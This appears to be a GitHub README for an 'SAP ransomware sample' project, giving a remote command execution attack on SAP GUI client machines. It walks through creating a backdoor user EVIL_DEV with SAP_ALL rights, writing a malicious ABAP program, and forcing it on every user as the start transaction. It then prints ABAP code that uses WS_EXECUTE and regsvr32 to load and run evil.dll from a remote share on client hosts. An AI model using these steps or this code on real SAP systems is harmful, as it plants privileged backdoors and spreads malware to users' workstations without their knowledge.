Project author: vah13

Project description:
Simple remote command execution exploit code for SAP GUI
Project address: git://github.com/vah13/SAP_ransomware.git
Created: 2018-01-18T11:45:31Z
Project community: https://github.com/vah13/SAP_ransomware


SAP ransomware sample

Simple remote command execution exploit code for SAP GUI
First, a malicious ABAP program has to be created on SAP NetWeaver AS ABAP.

1) To get RCE on a client's computer, it is necessary to create a user with developer rights, because the user SAP* cannot create or change any programs. To do this, run transaction su01 and create a new user with SAP_ALL rights under the login EVIL_DEV.

2) Then log in as the EVIL_DEV user, run transaction se38 and create a program named sap_malware_prog.

3) Once we are able to create a program, we click the Insert button, copy in a program that executes the malicious functionality, then save everything and activate the program.

4) Create a custom transaction with se93.

5) Connect the custom transaction to the malware program.

6) Set the mlauncher transaction as the default.

7) The screenshot shows that we set the start transaction, mlauncher, for all users.


ABAP code to execute any command on SAP client hosts

    CALL FUNCTION 'WS_EXECUTE'
      EXPORTING
        program     = 'c:\Windows\System32\regsvr32.exe'
        commandline = '/i /s \\REMOTE_FOLDER\tmp\evil.dll'
        INFORM      = ''
      EXCEPTIONS
        FRONTEND_ERROR     = 1
        NO_BATCH           = 2
        PROG_NOT_FOUND     = 3
        ILLEGAL_OPTION     = 4
        GUI_REFUSE_EXECUTE = 5
        OTHERS             = 6.

Using this vulnerability, developers or SAP administrators can execute any command on users' computers and infect them.